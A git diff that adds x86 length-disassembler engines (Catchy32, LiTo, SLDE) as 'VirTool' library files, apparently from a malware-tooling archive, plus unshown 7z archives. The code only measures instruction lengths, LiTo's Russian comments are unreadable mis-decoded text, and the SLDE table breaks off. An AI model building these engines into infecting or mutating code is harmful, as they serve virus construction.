BIN
libs/VirTool.Win32.Disassembler.Ade.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.Win32.Disassembler.Ade86.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.Win32.Disassembler.Bpde.7z Normal file
View File

Binary file not shown.

174
libs/VirTool.Win32.Disassembler.Catchy32.inc Normal file
View File

@ -0,0 +1,174 @@
; Catchy32 v1.6-2 - Length Disassembler Engine 32bit
; original source Catchy32.inc-orig (c) sars [HI-TECH] 2003
; this slightly opimized version - herm1t'2004
BITS 32
CPU 386
global catchy32
pref66h equ 1
pref67h equ 2
catchy32: pushad
mov esi, [esp + 36] ; pointer to opcode
sub esp, 256 ; allocate space for the table in stack
mov ebp, esp ; ebp <- opcode table
mov edi, esp
push esi
;; (1) unpack table
mov edx, esp ; save stack pointer
push 115
pop ecx
call .data
db 0x45,0x29,0x20,0x45,0x29,0x20,0x45,0x29
db 0x20,0x45,0x29,0x20,0x45,0x29,0x36,0x45
db 0x29,0x36,0x45,0x29,0x36,0x45,0x29,0x36
db 0xe0,0xe0,0x60,0x25,0x57,0x30,0x28,0x40
db 0xe7,0x27,0x2c,0x2b,0xc5,0xa0,0x31,0x40
db 0x4f,0x40,0x29,0x60,0x87,0x8f,0x2b,0x2d
db 0x25,0x2c,0x2e,0x2d,0x22,0x20,0x45,0x27
db 0x20,0x85,0x87,0x2f,0x32,0x40,0x36,0x37
db 0x20,0x25,0x60,0x65,0x33,0x40,0x35,0x34
db 0x23,0x85,0x26,0x75,0x45,0x46,0x85,0x60
db 0xb5,0xe5,0xe5,0xe5,0x65,0x4b,0x25,0x24
db 0x85,0xef,0x2f,0xe5,0x25,0x20,0x21,0x2a
db 0x25,0x20,0x21,0x2a,0xa5,0x35,0x2a,0x65
db 0x2a,0x2b,0x2a,0x80,0x34,0xe5,0xe5,0x25
db 0x34,0xc5,0x26
; xlat table
db 0x00,0x01,0x02,0x03,0x10,0x11,0x1e,0x22
db 0x23,0x28,0x31,0x33,0x39,0x40,0x60,0x88
db 0x89,0xc0,0xc2,0xe0,0xe1,0xee,0xf0,0xff
.data: pop esi
lea ebx, [esi + ecx]
xor eax, eax
.next: lodsb
push ecx
mov ecx, eax
shr ecx, 5
and al, 31
xlat
rep stosb
pop ecx
loop .next
mov esp, edx ; restore stack frame
;; /unpack
pop esi
push edi ; (2)
mov edi, esi ; (3)
cmp word [esi], 20cdh ; VXD call (6 bytes)
jne ExtFlags
inc esi
inc esi
lodsd
CalcLen: sub esi, edi ; (3)
cmp esi, 15
jbe OK
Error: xor esi, esi
dec esi
OK: pop esp ; (2)
mov [esp+4*7], esi
popad
ret
; ecx zero after loop
;==============================================================================
ExtFlags: xor eax, eax
xor ebx, ebx
cdq
lodsb ;al <- opcode
mov cl, al ;cl <- opcode
cmp al, 0fh ;Test on prefix 0Fh
jne NormTable
lodsb
inc ah ;EAX=al+100h (100h/2 - lenght first table)
NormTable: shr eax, 1 ;Elements tables on 4 bits
mov al, byte [ebp + eax]
jc IFC1
shr eax, 4 ;Get high 4-bits block if offset is odd, otherwise...
IFC1: and al, 0fh
xchg eax, ebx ;EAX will be needed for other purposes
CheckFlags: cmp bl, 0Eh ;Test on ErrorFlag
je Error
cmp bl, 0Fh ;Test on PrefixFlag
je Prefix
or ebx, ebx ;One byte command
jz CalcLen
btr ebx, 0 ;Command with ModRM byte
jc ModRM
btr ebx, 1 ;Test on imm8,rel8 etc flag
jc incr1
btr ebx, 2 ;Test on ptr16 etc flag
jc incr2
and bl, 11110111b ;Reset 16/32 sign
cmp cl, 0A0h ;Processing group 0A0h-0A3h
jb Check66h
cmp cl, 0A3h
ja Check66h
test ch, pref67h
jnz incr2
jmp incr4
Check66h: test ch, pref66h
jnz incr2
incr4: inc esi
inc esi
incr2: inc esi
incr1: inc esi
jmp_CheckFlags: jmp CheckFlags
;-----------------------------------------------
Prefix: cmp cl, 66h
je SetF66h
cmp cl, 67h
jne ExtFlags
SetF67h: or ch, pref67h
jmp ExtFlags
;-----------------------------------------------
SetF66h: or ch, pref66h
jmp ExtFlags
;-----------------------------------------------
ModRM: lodsb
cmp cl, 0F7h ;Check on 0F6h and 0F7h groups
je F6F7
cmp cl, 0F6h
jne ModXX
F6F7: test al, 00111000b ;Processing groups 0F6h and 0F7h
jnz ModXX
test cl, 00000001b
jz incbt1
test ch, 1
jnz incbt2
inc esi
inc esi
incbt2: inc esi
incbt1: inc esi
ModXX: mov edx, eax ;Processing MOD bits
and al, 00000111b ;al <- only R/M bits
test dl, 11000000b ;Check MOD bits
jz Mod00
jp CheckFlags ;Or c_Mod11
js Mod10
Mod01: test ch, pref67h
jnz incr1 ;16-bit addressing
cmp al, 4 ;Check SIB
je incr2
jmp incr1
;-----------------------------------------------
Mod00: test ch, pref67h
jz Mod00_32 ;32-bit addressing
cmp al, 6
je incr2
jmp jmp_CheckFlags
;-----------------------------------------------
Mod00_32: cmp al, 4 ;Check SIB
jne disp32
lodsb ;Processing SIB byte
and al, 00000111b
disp32: cmp al, 5
je incr4
jmp jmp_CheckFlags
;-----------------------------------------------
Mod10: test ch, pref67h
jnz incr2 ;16-bit addressing
cmp al, 4 ;Check SIB
jne incr4
inc esi
jmp incr4

BIN
libs/VirTool.Win32.Disassembler.Dde.7z Normal file
View File

Binary file not shown.

398
libs/VirTool.Win32.Disassembler.Lito.asm Normal file
View File

@ -0,0 +1,398 @@
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ;
; ### ;
; ### ;
; ### #################################################### ;
; ### #################################################### ;
; ### ### ### ;
; ### ### ### ######### ### ;
; ### ### ### ########### ;
; ### ### ## ## ;
; ### ### ### ## ## ;
; ### ### ### ## ## ;
; ### ### ### ### ## ## ;
; ### ### ### ### ## ## ;
; ############ ### ### ########### ;
; ################################################################ ;
; ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; Advanced Length dIsassembler moTOr:) ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ‚¥àá¨ï 2.1 ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;äã­ªæ¨ï _LiTo_ ;
;¤¨§ áᥬ¡«¨à®¢ ­¨¥ ¬ è¨­­®© ª®¬ ­¤ë ;
;®¯à¥¤¥«¥­¨¥ ¤«¨­ë ¬ è¨­­®© ª®¬ ­¤ë ;
;‚室: ;
;esi -  ¤à¥á à §¡¨à ¥¬®© ¬ è¨­­®© ª®¬ ­¤ë ;
;edi - 㪠§ â¥«ì ­  ¢ë室­ãî áâàãªâãàã (¨«¨ ¡ãä¥à) (­ §®¢¥¬ ¥¥ INSTR:) ;
;‚ë室: ;
;¢ eax - ¤«¨­  ¬ è¨­­®© ª®¬ ­¤ë. ;
;‡ ¬¥âª¨: ;
;(x) ‚ë室­ ï áâàãªâãà  (¨«¨ ¡ãä¥à) § ¯®«­ï¥âáï ¢ ¯à®æ¥áᥠ¤¨§ áᥬ¡«¨à®¢ ­¨ï ;
;¨­áâàãªæ¨¨ ¨ ¤®«¦­  ¯à¥¤áâ ¢«ïâì ᮡ®© á«¥¤ãî饥: ;
; ;
; INSTR1 struct ;
; (+ 00) len_com db 00h ; - ¤«¨­  ª®¬ ­¤ë; ;
; (+ 01) flags dd 00h ; - ¢ëáâ ¢«¥­­ë¥ ä« £¨ ;
; (+ 05) seg db 00h ; - ᥣ¬¥­â (¥á«¨ ¥áâì); ;
; (+ 06) repx db 00h ; - ¯à¥ä¨ªá (0F2h/0F3h) (¥á«¨ ¥áâì); ;
; (+ 07) len_offset db 00h ; - à §¬¥à ᬥ饭¨ï; ;
; (+ 08) len_operand db 00h ; - à §¬¥à ®¯¥à ­¤ ; ;
; (+ 09) opcode db 00h ; - ®¯ª®¤ (¥á«¨ ®¯ª®¤=0Fh, ⮣¤  ;
; ; á á®åà ­ï¥âáï 2-®© ®¯ª®¤, ¨ ;
; ; ãáâ ­ ¢«¨¢ ¥âáï ä« £ B_OPCODE2); ;
; (+ 10) modrm db 00h ; - ¡ ©â MODRM (â ª¦¥, ¥á«¨ ¥áâì) ;
; (+ 11) sib db 00h ; - ¡ ©â SIB ;
; (+ 12) offset db 8 dup (00h); - ᬥ饭¨¥ ¨­áâàãªæ¨¨ ;
; (+ 20) operand db 8 dup (00h); - ®¯¥à ­¤ ¨­áâàãªæ¨¨ ;
; INSTR1 ends ;
; ;
;(å) ¯®­¨¬ îâáï (¯®ª ) ⮫쪮 general purpose & fpu instructions ;
; (®áâ «ì­ë¥ - ¢ ⮯ªã:)! ;
;(å) ­¥â ¯à®¢¥àª¨ ­  ¬ ªá¨¬ «ì­ãî ¤«¨­ã ¨­áâàãªæ¨¨ (15 ¡ ©â) (­ å७) ;
;(å) Š ª ¯®áâ஥­ë í⨠⠡«¨çª¨: ;
; Ž—…<E28094>œ <20><>ŽŽ: â ª ª ª ¢ í⮬ ¤¨§ á¬¥ ¨á¯®«ì§ãîâáï ä« £¨ á ç¨á«®¢ë¬ ;
; ®¡®§­ ç¥­¨¥¬ <=8, â® ¤«ï ®¤­®£® ä« £  ¤®áâ â®ç­® ¬¥áâ  ¢ ¯®«®¢¨­ã ¡ ©â  ;
; (¬ ªá¨¬ «ì­®¥ ç¨á«® =8 (B_PREFIX6X) - ¢ ¤¢®¨ç­®¬ ¯à¥¤áâ ¢«¥­¨¨ =1000b). ;
; ‡­ ï íâ®, ¯à®áâ® â㯮 ¢ ®¤¨­ ¡ ©â § ¯¨å¨¢ ¥¬ 2 ä« £  - ¢®â ¨ ¢á¥. ’ ª¨¬ ;
; ®¡à §®¬, ª ¦¤ ï â ¡«¨çª  ¢ 256 ¡ ©â ã१ ¥âáï ¤® 128. ;
;(å) „«ï 32-¡¨â­®£® ¨á¯®«­ï¥¬®£® ª®¤ . ;
;(å) Šâ® å®ç¥â, ¯ãáâì ­ ä¨£ á ¬ ¨ ¤®¡ ¢«ï¥â ®áâ «ì­ë¥ ª®¬ ­¤ë ¨ ¢á直¥ â ¬ ;
; ¯à®¢¥àª¨. ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;
;
;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ”ˆ—ˆ: ;
;(+) ¡ §®­¥§ ¢¨á¨¬®áâì ;
;(+) 㯠ª®¢ ­­ë¥ â ¡«¨çª¨ ;
; ;
;(-) ¬ãâ®à­® ¤®¡ ¢«ïâì ­®¢ë¥ ¨­áâàãªæ¨¨ ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;
;
;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ˆ<CB86>Žœ‡Ž<E2809A>ˆ…: ;
;1)<29>®¤ª«î祭¨¥: ;
; lito.asm ;
;2)‚맮¢:(¯à¨¬¥à) ;
; lea esi,XXXXXXXXh ; ¤à¥á ª®¬ ­¤ë, çìî ¤«¨­ã ­ ¤® 㧭 âì ;
; lea edi,XXXXXXXXh ;lea edi,INSTR1 ;
; call LiTo ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;m1x
;pr0mix@mail.ru
_LiTo_:
pushad
call _delta_lito_
;===================================================================================
;áâப  ¯à¥ä¨ªá®¢
pfx:
db 2Eh,36h,3Eh,26h,64h,65h,0F2h,0F3h,0F0h,66h,67h
SizePfx equ $-pfx ;¤«¨­  pfx
;===================================================================================
;â ¡«¨æ  ä« £®¢ ¤«ï ®¤­®¡ ©â­ëå ®¯ª®¤®¢
TableFlags1:
; 01 23 45 67 89 AB CD EF
db 11h,11h,28h,00h,11h,11h,28h,00h ;00
db 11h,11h,28h,00h,11h,11h,28h,00h ;01
db 11h,11h,28h,00h,11h,11h,28h,00h ;02
db 11h,11h,28h,00h,11h,11h,28h,00h ;03
db 00h,00h,00h,00h,00h,00h,00h,00h ;04
db 00h,00h,00h,00h,00h,00h,00h,00h ;05
db 00h,11h,00h,00h,89h,23h,00h,00h ;06
db 22h,22h,22h,22h,22h,22h,22h,22h ;07
db 39h,33h,11h,11h,11h,11h,11h,11h ;08
db 00h,00h,00h,00h,00h,0C0h,00h,00h ;09
db 88h,88h,00h,00h,28h,00h,00h,00h ;0A
db 22h,22h,22h,22h,88h,88h,88h,88h ;0B
db 33h,40h,11h,39h,60h,40h,02h,00h ;0C
db 11h,11h,22h,00h,11h,11h,11h,11h ;0D
db 22h,22h,22h,22h,88h,0C2h,00h,00h ;0E
db 00h,00h,00h,11h,00h,00h,00h,11h ;0F
;===================================================================================
;â ¡«¨æ  ä« £®¢ ¤«ï ¤¢ãå¡ ©â­ëå ®¯ª®¤®¢
TableFlags2:
; 01 23 45 67 89 AB CD EF
db 11h,11h,00h,00h,00h,00h,01h,00h ;00
db 00h,00h,00h,00h,00h,00h,00h,01h ;01
db 11h,11h,00h,00h,00h,00h,00h,00h ;02
db 00h,00h,00h,00h,00h,00h,00h,00h ;03
db 11h,11h,11h,11h,11h,11h,11h,11h ;04
db 00h,00h,00h,00h,00h,00h,00h,00h ;05
db 00h,00h,00h,00h,00h,00h,00h,00h ;06
db 00h,00h,00h,00h,00h,00h,00h,00h ;07
db 88h,88h,88h,88h,88h,88h,88h,88h ;08
db 11h,11h,11h,11h,11h,11h,11h,11h ;09
db 00h,01h,31h,00h,00h,01h,31h,01h ;0A
db 11h,11h,11h,11h,00h,31h,11h,11h ;0B
db 11h,00h,00h,01h,00h,00h,00h,00h ;0C
db 00h,00h,00h,00h,00h,00h,00h,00h ;0D
db 00h,00h,00h,00h,00h,00h,00h,00h ;0E
db 00h,00h,00h,00h,00h,00h,00h,00h ;0F
;===================================================================================
SizeTbl equ $-pfx
;===================================================================================
;ä« £¨
;-----------------------------------------------------------------------------------
B_NONE equ 00h ;xex
B_MODRM equ 01h ;present byte MODRM
B_DATA8 equ 02h ;present imm8,rel8, etc
B_DATA16 equ 04h ;present imm16,rel16, etc
B_PREFIX6X equ 08h ;present imm16/imm32 (¢ § ¢¨á¨¬®á⨠®â ­ «¨ç¨ï ¯à¥ä¨ªá  0x66 (0x67 ¤«ï ®¯ª®¤®¢ 0xA0-0xA3))
B_SEG equ 10h ;present segment (¯à¨¬¥à: 0x2e,0x3E, etc)
B_PFX66 equ 20h ;present byte 0x66
B_PFX67 equ 40h ;present byte 0x67
B_LOCK equ 80h ;present byte LOCK (0xF0)
B_REP equ 100h ;present byte rep[e/ne]
B_OPCODE2 equ 200h ;present second opcode (first opcode=0x0F)
B_SIB equ 400h ;present byte SIB
B_RELX equ 800h ;present jxx/jmp/call (rel8,rel16,rel32)
;===================================================================================
_delta_lito_:
pop ebp
cld
xor eax,eax
xor ebx,ebx
cdq ;¢ edx: dl(0/1) - ­¥â/¥áâì ¯à¥ä¨ªá 0x66
; dh(0/1) - ­¥â/¥áâì ¯à¥ä¨ªá 0x67
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG ¯®¨áª ¯à¥ä¨ªá®¢xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_nextpfx_:
lodsb ;¯®«ãç ¥¬ ®ç¥à¥¤­®© ¡ ©â ª®¬ ­¤ë
push edi
lea edi,[ebp+(pfx-_delta_lito_+SizeTbl)] ;¢ edi -  ¤à¥á áâப¨ ¯à¥ä¨ªá®¢
db 6Ah,SizePfx
pop ecx
repne scasb ;¥áâì «¨ ¢ à §¡¨à ¥¬®© ª®¬ ­¤¥ ¯à¥ä¨ªáë?
pop edi
jne _endpfx_ ;­¥â? - ­  ¢ë室
cmp ecx,5
jl _lock_
or bl,B_SEG
mov byte ptr [edi+05h],al ;seg
_lock_:
cmp al,0F0h
jne _rep_
or bl,B_LOCK
_rep_:
mov ch,al
and ch,0FEh
cmp ch,0F2h
jne _66_
or bx,B_REP
mov byte ptr [edi+06h],al ;rep
_66_:
cmp al,66h ;¨­ ç¥ ᬮâਬ, íâ® 0x66?
jne _67_
mov dl,1
or bl,B_PFX66
_67_:
cmp al,67h ;¨­ ç¥, íâ® 0x67?
jnz _nextpfx_ ;¥á«¨ ­¥â, â® ¨é¥¬ ¤à㣨¥ ¯à¥ä¨ªáë
mov dh,1
or bl,B_PFX67
jmp _nextpfx_ ;¯à®¤®«¦ ¥¬ ¯®¨áª
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND ¯®¨áª ¯à¥ä¨ªá®¢xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_endpfx_:
_search_jxx_call_jmp_:
mov ch,al
and ch,0FEh
cmp ch,0E8h
je _jxxok_
mov ch,al
and ch,11110000b
cmp ch,70h
je _jxxok_
cmp al,0EBh
je _jxxok_
cmp al,0Fh ;®¯ª®¤ á®á⮨⠨§ 2-å ¡ ©â?
jne _opcode_
lodsb ;¥á«¨ ¤ , â® ¡¥à¥¬ 2-®© ¡ ©â ®¯ª®¤ 
mov cl,80h ;¨ 㢥«¨ç¨¢ ¥¬ cl=80h
or bx,B_OPCODE2
mov ch,al
and ch,11110000b
cmp ch,80h
jne _opcode_
_jxxok_:
or bx,B_RELX
;-----------------------------------------------------------------------------------
_opcode_:
xor ch,ch
mov byte ptr [edi+09h],al ;save first opcode
lea ebp,[ebp+ecx+(TableFlags1-_delta_lito_+SizeTbl)];¢ edi -  ¤à¥á ­ã¦­®© â ¡«¨æë ä« £®¢(å à-ª)
cmp al,0A0h ;¥á«¨ ®¯ª®¤>=0xA0 ¨ ®¯ª®¤<=A3,
jl _01_;jb ;
cmp al,0A3h
jg _01_
test cl,cl
jne _01_;je ;â® dl=dh
mov dl,dh ;mov dl,dh
;-----------------------------------------------------------------------------------
_01_:
push eax
shr eax,1
mov cl,byte ptr [ebp+eax] ;¢ cl - ä« £¨ ª®¬ ­¤ë
jc _noCF_
shr cl,4
_noCF_:
and cl,0Fh
xor ebp,ebp ;¢ ebp - ¡ã¤¥â åà ­¨âìáï ¤«¨­  ᬥ饭¨ï(offset)
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG à §¡®à MODRMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
or ecx,ebx
pop ebx ;bl=opcode
test cl,B_MODRM ;¯à¨áãâáâ¢ã¥â «¨ ¡ ©â modrm?
je _endmodrm_ ;­¥â? ­  ¢ë室
lodsb ;al=modrm
mov byte ptr [edi+10],al ;MODRM
mov ah,al
;-----------------------------------------------------------------------------------
shr ah,6 ;ah=mod
;-----------------------------------------------------------------------------------
test al,38h ;¤ «¥¥ ᬮâਬ, à ¢­® «¨ ¯®«¥ reg==0?
jne _03_
sub bl,0F6h ;¥á«¨ ¤ , ⮠ᬮâਬ ­  ®¯ª®¤:
jne _02_ ;à ¢¥­ «¨ ®­ 0xF6 ¨«¨ 0xF7(test)?
or cl,B_DATA8 ;¥á«¨ ¤ , â® ãáâ ­ ¢«¨¢ ¥¬ ­ã¦­ë© ä« £
_02_:
dec ebx
jne _03_
or cl,B_PREFIX6X
;-----------------------------------------------------------------------------------
_03_:
and al,07h
xor ebx,ebx ;bl ®â¢¥ç ¥â §  ¯à¨áãâá⢨¥ ¡ ©â  sib
mov bh,ah ;bh=mod
cmp dh,1 ;¥áâì «¨ ¢ à §¡¨à ¥¬®© ª®¬ ­¤¥ ¯à¥ä¨ªá 0x67?
je _mod00_ ;¥á«¨ ¤ , â® ¯¥à¥áª ª¨¢ ¥¬
cmp al,4 ;¨­ ç¥ ¯à®¢¥à塞,à ¢­® «¨ ¯®«¥ rm==4?
jne _mod00_
inc ebx ;¥á«¨ ¤ , â® ¢®§¬®¦­® ¥áâì sib
;-----------------------------------------------------------------------------------
_mod00_:
test ah,ah ;¯®«¥ mod==0?
jne _mod01_
dec dh ;ᮤ¥à¦¨â «¨ ª®¬ ­¤  0x67?
jne _nop67_ ;­¥â? ¯¥à¥áª ª¨¢ ¥¬
cmp al,6 ;¥á«¨ ¤ , â® rm==6?
jne _sib_
inc ebp ;¥á«¨ ¤ , â® ¤«¨­  ᬥ饭¨ï=2(16 bit)
inc ebp
_nop67_:
cmp al,5 ;¨­ ç¥, rm==5?
jne _sib_
add ebp,4 ;¥á«¨ ¤ , â® ¤«¨­  ®ääá¥â =4 (32 bit)
jmp _sib_ ;¨¤¥¬ ¤ «ìè¥
;-----------------------------------------------------------------------------------
_mod01_: ;mod==1?
dec ah
jne _mod02_
inc ebp ;¤ ? ⮣¤  ebp=1
jmp _sib_
;-----------------------------------------------------------------------------------
_mod02_: ;mod==2?
dec ah
jne _mod03_
inc ebp ;ebp=2
inc ebp
dec dh ;¥á«¨ ¥áâì ¯à¥ä¨ªá  0x67, ¯¥à¥áª ª¨¢ ¥¬ ¤ «ìè¥
je _sib_
inc ebp ;â® ebp+=2
inc ebp
inc ebx
;-----------------------------------------------------------------------------------
_mod03_: ;mod==3?
dec bl ;¥á«¨ ¤ , ⮣¤  sib'  â®ç­® ­¥â!
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND à §¡®à MODRMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG ¯®«ã祭¨¥ SIBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_sib_:
dec bl ;¥áâì «¨ ¡ ©â sib?
jne _endmodrm_
or cx,B_SIB
lodsb ;¥á«¨ ¤ , â® ¢ al ⥯¥àì «¥¦¨â sib(al=sib)
mov byte ptr [edi+11],al ;SIB
and al,7 ;¤ «¥¥,
cmp al,5 ;al==5?
jne _endmodrm_
test bh,bh ;¥á«¨ ¤ , ⮠ᬮâਬ, ¯®«¥ mod==0?
jne _endmodrm_
push 4 ;¥á«¨ ¤ , â® ¥áâì 4-¡ ©â®¢®¥ ᬥ饭¨¥
pop ebp
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND ¯®«ã祭¨¥ SIBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG ä« £¨xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_endmodrm_:
xor ebx,ebx
test cl,B_DATA8 ;¥áâì «¨ ®¤­®¡ ©â®¢®¥ ᬥ饭¨¥?
je _nf1_
inc ebx
_nf1_:
test cl,B_DATA16 ;¥áâì «¨ ¤¢ãå¡ ©â®¢®¥ ᬥ饭¨¥?
je _nf2_
inc ebx
inc ebx
_nf2_:
test cl,B_PREFIX6X ;¥áâì «¨ ¢ ª®¬ ­¤¥ ­¥¯®á।á⢥­­®¥ §­ ç¥­¨¥?
je _endflag_
dec dl ;¥áâì «¨ 0x66(0x67 ¤«ï [0xA0,0xA3]) ¢ à §¡¨à ¥¬®© ª®¬ ­¤¥?
je _okp66_
inc ebx
inc ebx
_okp66_:
inc ebx
inc ebx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND ä« £¨xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_endflag_:
push ecx
push edi
mov ecx,ebp
add edi,12
rep movsb
sub edi,ebp
add edi,8
mov ecx,ebx
rep movsb
pop edi
pop dword ptr [edi+1]
sub esi,dword ptr [esp+4];eax
xchg esi,eax
mov byte ptr [edi+0],al
mov dword ptr [esp+7*4],eax ;á®å࠭塞 à §¬¥à ¢ ¥ å
xchg ebp,eax
mov byte ptr [edi+7],al
mov byte ptr [edi+8],bl
popad
ret ;¢ë室¨¬:)
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;Š®­¥æ ä㭪樨 _LiTo_ ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
SizeOfLiTo equ $-_LiTo_ ;à §¬¥à ä㭪樨 _LiTo_

90
libs/VirTool.Win32.Disassembler.SLDE.a Normal file
View File

@ -0,0 +1,90 @@
/* yaav */
/* SLDE 0.1v */
/* This is simple lengh disassembler engine for IA32 x86 instruction set.The code is
Operation System independent. For now it supports only the most used one byte
opcodes(without few rarely used opcodes)but i will expand it in future :)
Credits goes to Benny- and Napalm. Thanks guys :) */
#define Prefix 5
#define ModRMy 1
#define ModRMn 0
#define Imm08 8
#define Imm32 32 /*16/32 bit Imm*/
#define ModRM 3 /*Unknown Opcode*/
unsigned char Array[] = "\x67\x66\x81\x05\x11\x11\x00\x00\x11\x11";
unsigned char ModRMTable[] = {
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /*00..07*/
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 08..0F*/
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 10..17 */
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 18..1F */
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 20..27 */
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 28..2F */
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 30..37 */
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 38..3F */
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 40..47 */
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 48..4F */
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 50..57 */
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 58..5F */
ModRMn,ModRMn,ModRMy,ModRMy,Prefix,Prefix,Prefix,Prefix, /* 60..67 */
ModRMn+Imm32,ModRMy+Imm32,ModRMn+Imm08,ModRMy+Imm08,ModRMn,ModRMn,ModRMn,ModRMn, /* 68..6F */
ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* 70..77 */
ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* 78..7F */
ModRMy+Imm08,ModRMy+Imm32,ModRMy+Imm08,ModRMy+Imm08,ModRMy,ModRMy,ModRMy,ModRMy, /* 80..87 */
ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy, /* 88..8F */
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /*90..97 */
ModRMn,ModRMn,ModRM/*9A Unknown */,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 98..9F */
ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn,ModRMn,ModRMn,ModRMn, /* A0..A7 */
ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* A8..AF */
ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* B0..B7 */
ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32, /* B8..BF */
ModRMy+Imm08,ModRMy+Imm08,ModRM /* RET WORD */,ModRMn,ModRMy,ModRMy,ModRMy+Imm08,ModRMy+Imm32, /* C0..C7 */
ModRM /* C8 Unknown */,ModRMn,ModRM /* RET WORD */,ModRMn,ModRMn,ModRMn+Imm08,ModRMn,ModRMn, /* C8..CF */
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm08,ModRMn,ModRMn, /* D0..D7 */
ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy, /* D8..DF */
ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* E0..E7 */
ModRMn+Imm32,ModRMn+Imm32,ModRM /*EA Unknown */,ModRMn+Imm08,ModRMn,ModRMn,ModRMn,ModRMn, /* E8..EF */
